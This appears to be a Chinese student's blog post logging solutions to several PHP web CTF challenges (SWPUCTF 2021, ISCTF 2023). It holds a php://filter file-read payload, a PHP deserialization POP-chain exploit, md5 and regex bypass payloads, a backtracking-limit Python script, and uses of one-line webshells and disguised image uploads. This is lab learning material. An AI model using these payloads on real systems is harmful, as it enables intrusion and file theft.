学习记录3

[SWPUCTF 2021 新生赛]easy_md5

一道简单的md5题

get传参,post传参,参数值不同而md5值相同时,即获得flag

这题是弱类型比较,“==”为弱相等,此题也可以用0e开头的md5值

[SWPUCTF 2021 新生赛]include

传个"file"参数试试

接下来利用file参数,使用php伪协议,?file=php://filter/read=convert.base64-encode/resource=flag.php 

在上次记录中我们知道payload的内容可获取BASE64形式的flag

filter定义了要用于数据流的过滤器,read=convert.base-encode/resourve=flag.php表示在读取数据流时,将数据转换为 base64 编码,而convert就是将其他形式的数据流转换成字符串的形式。

base64一下即可

[SWPUCTF 2021 新生赛]caidao

显然一句话木马,直接连接然后终端运行 cat /flag

[SWPUCTF 2021 新生赛]Do_you_know_http

关于http的一些问题

 去burp改一下Agent

重定向

本地访问

先写点简单题混混,明天继续写

[第五空间 2021]WebFTP

算是道信息搜集?

看起来是道登录,我一开始想的是爆破,但是爆破时间成本太高,先dirsearch扫描一下看看有什么东西

发现有git泄露和phpfino文件,进入phpfino文件搜索关键字即可

[ISCTF 2023] 圣杯战争

之前做出来的一道反序列化,现在复习一下

直接给了源码,审一下吧

利用点是include

Poc链为summon:_wakeup->artifact:to_string()->prepare:function()->saber:invoke()

<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;

}

class prepare{
    public $release;
}
class saber{
    public $weapon="php://filter/read=convert.base64-encode/resource=flag.php";
    }
class summon{
    public $Saber;
    }
$a=new summon();
$a->Saber=new artifact();
$a->Saber->excalibuer=new prepare();
$a->Saber->excalibuer->release=new saber();
$a->Saber->excalibuer->release->weapon;
echo urlencode(serialize($a));
?>

之后即可获得flag

[ISCTF 2023] 绕进你的心里

 <?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?> 

 这是源代码,在url中访问需要用&链接多个参数,绕过md5和num的正则都可以用数组

payload:?shennong[]=1&hongmeng[]=2&zhurong[]=1

之后绕过字符串正则,访问超过一百万次后preg_match会返回false

import requests
url="http://gz.imxbt.cn:30490/?shennong[]=1&hongmeng[]=2&zhurong[]=1"
param='very'*250000+"2023ISCTF"
data={
    "pan_gu":param
}
res=requests.post(url,data)
print(res.text)

即可获得Flag

[ISCTF  2023]  where_is_the_flag

这个题就是蚁剑翻目录,有一句话木马,直接链接,得第一部分flag

根目录有两个其他部分

 

[SWPUCTF 2021 新生赛]babyrce

申码,发现要改cookie

访问文件

过滤空格,命令执行,瞅一眼根目录

cat 即可

[SWPUCTF 2021 新生赛]easyupload1.0

写个图片一句话,上传之后burp改包,蚁剑链接

flag.php的flag是假的,不是真的

post一个a在phpinfo看看

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值